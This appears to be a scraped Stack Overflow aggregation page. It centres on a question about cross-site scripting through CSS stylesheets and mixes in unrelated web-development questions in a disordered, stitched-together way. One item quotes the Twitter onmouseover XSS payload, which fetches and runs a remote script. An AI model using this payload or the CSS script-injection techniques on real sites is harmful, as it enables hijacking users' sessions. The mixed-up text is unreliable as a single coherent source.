From the [browser security handbook][1]

&gt;The risk of JavaScript execution. As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this goal: by using the expression(...) directive, which gives the ability to evaluate arbitrary JavaScript statements and use their value as a CSS parameter; by using the url(&#39;javascript:...&#39;) directive on properties that support it; or by invoking browser-specific features such as the [-moz-binding mechanism of Firefox][2]. 

... and after reading that, I find this on StackOverflow. See https://stackoverflow.com/questions/476276/using-javascript-in-css#answer-482088
In Firefox, you can use [XBL][3] to inject javascript in a page via CSS. However, the XBL file must reside in the same domain, now that [bug 324253 is fixed][4].

There is another interesting (though different from your question) way to abuse CSS. See http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html. Essentially, you misuse the CSS parser to steal content from a different domain. 


  [1]: http://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets
  [2]: http://www.securiteam.com/securitynews/5LP051FHPE.html
  [3]: http://www.mozilla.org/projects/xbl/
  [4]: https://bugzilla.mozilla.org/show_bug.cgi?id=324253

The OWASP Mutillidae project has a Cascading Style Injection vulnerability example on page： http://localhost/mutillidae/index.php?page=set-background-color.php

Of course, you need to setup the env locally first. You can download and set it up on your localhost from the following link:
https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project

Here is the relevant hint:
https://github.com/hyprwired/mutillidae/blob/master/includes/hints-level-1/cascading-style-sheet-injection-hint.inc

yes its call **Xsstc** , read more in this article:

[link][1]


  [1]: https://redia.tistory.com/36

Can someone point me in the right direction on how to open a .mdb file in python? I normally like including some code to start off a discussion, but I don&#39;t know where to start. I work with mysql a fair bit with python. I was wondering if there is a way to work with .mdb files in a similar way?

  

how to deal with .mdb access files with python

i have a website in which i have to put some lines in Arabic.... how to do it...

where to get the Arabic text characters... how to make the page support Arabic...

i have to put a line per page and there is a lotta lotta pages so can&#39;t go around making images and putting them...

![alt text][1]


  [1]: http://i.stack.imgur.com/7kuBO.png

HTML - Arabic Support

Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this?
I know you can use style tags but what about stylesheets?

Cross Site Scripting in CSS Stylesheets

<p>Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this?
I know you can use style tags but what about stylesheets?</p>


I am trying to place my div with some notes in the **bottom right** position of the screen which will be displayed all time.

I used following css for it:

    #foo
    {
         position: fixed;
         bottom: 0;
         right: 0;
    }

It works fine with Chrome 3 and Firefox 3.6 but IE8 sucks... 

what can be a suitable solution for it?

How to position a div in bottom right corner of a browser?

How do I apply a style to an empty input box? If the user types something in the input field, the style should no longer be applied. Is this possible in CSS? I tried this:

    input[value=&quot;&quot;]


Matching an empty input box using CSS

How can I make div &#39;left&#39; and &#39;right&#39; look like columns side by side? 

I know I can use float:left on them and that will work... but on step 5 and 6 in here http://www.barelyfitz.com/screencast...s/positioning/
the guy says it is possible, I can&#39;t get it work though...

Code:

    &lt;style&gt;
    div.left {
        background:blue;
        height:200px;
        width:300px;
    }
    
    div.right{
        background:green;
        height:300px;
        width:100px;
    }
    
    .container{
        background:black;
        height:400px;
        width:450px;
    }
    &lt;/style&gt;
    
    &lt;div class=&quot;container&quot;&gt;
            &lt;div class=&quot;left&quot;&gt;
                LEFT
            &lt;/div&gt;
            &lt;div class=&quot;right&quot;&gt;
                RIGHT
            &lt;/div&gt;
    &lt;/div&gt;

Div side by side without float

Usual CSS centering issue, just not working for me, the problem is that I don&#39;t know the finished width px

I have a div for the entire nav and then each button inside, they dont center anymore when there is more than one button. :(

&lt;!-- begin snippet: js hide: false console: true babel: false --&gt;

&lt;!-- language: lang-css --&gt;

    .nav {
      margin-top: 167px;
      width: 1024px;
      height: 34px;
    }

    .nav_button {
      height: 34px;
      margin: 0 auto;
      margin-right: 10px;
      float: left;
    }

&lt;!-- language: lang-html --&gt;

    &lt;div class=&quot;nav&quot;&gt;
      &lt;div class=&quot;nav_button&quot;&gt;
        &lt;div class=&quot;b_left&quot;&gt;&lt;/div&gt;
        &lt;div class=&quot;b_middle&quot;&gt;Home&lt;/div&gt;
        &lt;div class=&quot;b_right&quot;&gt;&lt;/div&gt;

      &lt;/div&gt;
      &lt;div class=&quot;nav_button&quot;&gt;
        &lt;div class=&quot;b_left&quot;&gt;&lt;/div&gt;
        &lt;div class=&quot;b_middle&quot;&gt;Contact Us&lt;/div&gt;
        &lt;div class=&quot;b_right&quot;&gt;&lt;/div&gt;

      &lt;/div&gt;
    &lt;/div&gt;

&lt;!-- end snippet --&gt;

Any help would be greatly appreciated. Thanks

&lt;hr /&gt;

&lt;strong&gt;Result&lt;/strong&gt;

If the width is unknown, I did find a way a center the buttons, not entirely happy but doesnt matter, it works :D

The best way is to put it in a table 

  

    &lt;table class=&quot;nav&quot; align=&quot;center&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;div class=&quot;nav_button&quot;&gt;
                &lt;div class=&quot;b_left&quot;&gt;&lt;/div&gt;
                &lt;div class=&quot;b_middle&quot;&gt;Home&lt;/div&gt;
                &lt;div class=&quot;b_right&quot;&gt;&lt;/div&gt;
            &lt;/div&gt;
    
            &lt;div class=&quot;nav_button&quot;&gt;
                &lt;div class=&quot;b_left&quot;&gt;&lt;/div&gt;
                &lt;div class=&quot;b_middle&quot;&gt;Contact Us&lt;/div&gt;
                &lt;div class=&quot;b_right&quot;&gt;&lt;/div&gt;
            &lt;/div&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
      &lt;/table&gt;

Button Center CSS

How can I split the content of a HTML file in screen-sized chunks to &quot;paginate&quot; it in a WebKit browser? 

Each &quot;page&quot; should show a complete amount of text. This means that a line of text must not be cut in half in the top or bottom border of the screen.

**Edit**

This question was originally tagged &quot;Android&quot; as my intent is to build an Android ePub reader. However, it appears that the solution can be implemented just with JavaScript and CSS so I broadened the scope of the question to make it platform-independent.


HTML book-like pagination

Any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes,etc. from POSTed data?

I don&#39;t want to have to write a regex for all that :)

Any suggestions?

Preventing XSS in Node.js / server side javascript

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:  

&lt;pre&gt;http://t.co/@&quot;style=&quot;font-size:999999999999px;&quot;onmouseover=&quot;$.getScript(&#39;http:\u002f\u002fis.gd\u002ffl9A7&#39;)&quot;/&lt;/pre&gt;

Is this technically an XSS attack or something else?

Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Today&#39;s XSS onmouseover exploit on twitter.com

I have a lot of user inputs from `$_GET` and `$_POST`... At the moment I always write `mysql_real_escape_string($_GET[&#39;var&#39;])`..

I would like to know whether you could make a function that secures, escapes and cleans the `$_GET`/`$_POST` arrays right away, so you won&#39;t have to deal with it each time you are working with user inputs and such.

I was thinking of an function, e.g `cleanMe($input)`, and inside it, it should do `mysql_real_escape_string`, `htmlspecialchars`, `strip_tags`, `stripslashes` (I think that would be all to make it clean &amp; secure) and then return the `$input`.

So is this possible? Making a function that works for all `$_GET` and `$_POST`, so you would do only this:

    $_GET  = cleanMe($_GET);
    $_POST = cleanMe($_POST);

So in your code later, when you work with e.g `$_GET[&#39;blabla&#39;]` or `$_POST[&#39;haha&#39;]` , they are secured, stripped and so on?

Tried myself a little:

    function cleanMe($input) {
       $input = mysql_real_escape_string($input);
       $input = htmlspecialchars($input, ENT_IGNORE, &#39;utf-8&#39;);
       $input = strip_tags($input);
       $input = stripslashes($input);
       return $input;
    }




The ultimate clean/secure function

I read the tutorial [DIY widgets - How to embed your site on another site](https://web.archive.org/web/20080720015427/http://drnicwilliams.com/2006/11/21/diy-widgets/) for XSS Widgets by Dr. Nic.  

I&#39;m looking for a way to pass parameters to the script tag. For example, to make the following work:


    &lt;script src=&quot;http://path/to/widget.js?param_a=1&amp;amp;param_b=3&quot;&gt;&lt;/script&gt;

Is there a way to do this?

___

Two interesting links:

  * https://stackoverflow.com/questions/2170439/how-to-embed-javascript-widget-that-depends-on-jquery-into-an-unknown-environment (Stackoverflow discussion)
  * [An article on passing parameters to a script tag](http://feather.elektrum.org/book/src.html)

How to pass parameters to a Script tag?

Is there a known XSS or other attack that makes it past a 

    $content = &quot;some HTML code&quot;;
    $content = strip_tags($content);
  
    echo $content;

?

The [manual][1] has a warning:

 &gt; This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.

but that is related to using the `allowable_tags` parameter only.

 **With no allowed tags set**, is `strip_tags()` vulnerable to any attack?

[Chris Shiflett][2] seems to say it&#39;s safe:

&gt; Use Mature Solutions
&gt;
&gt;When possible, use mature, existing solutions instead of trying to create your own. Functions like strip_tags() and htmlentities() are good choices.

is this correct? Please if possible, quote sources.

I know about HTML purifier, htmlspecialchars() etc.- I am **not** looking for the best method to sanitize HTML. I just want to know about this specific issue. This is a theoretical question that came up [here][3].

Reference: [`strip_tags()` implementation in the PHP source code][4]


  [1]: http://php.net/strip_tags
  [2]: http://shiflett.org/articles/foiling-cross-site-attacks
  [3]: https://stackoverflow.com/questions/5788314
  [4]: http://lxr.php.net/opengrok/xref/PHP_5_3/ext/standard/string.c#php_strip_tags_ex

Content Type	Original Author	Original Content on Stackoverflow
Question	Johnny	View Question on Stackoverflow
Solution 1 - Css	Sripathi Krishnan	View Answer on Stackoverflow
Solution 2 - Css	ZillGate	View Answer on Stackoverflow
Solution 3 - Css	Haim Evgi	View Answer on Stackoverflow

Cross Site Scripting in CSS Stylesheets

Css Problem Overview

Css Solutions

Solution 1 - Css

Solution 2 - Css

Solution 3 - Css

HTML - Arabic Support

how to deal with .mdb access files with python

Attributions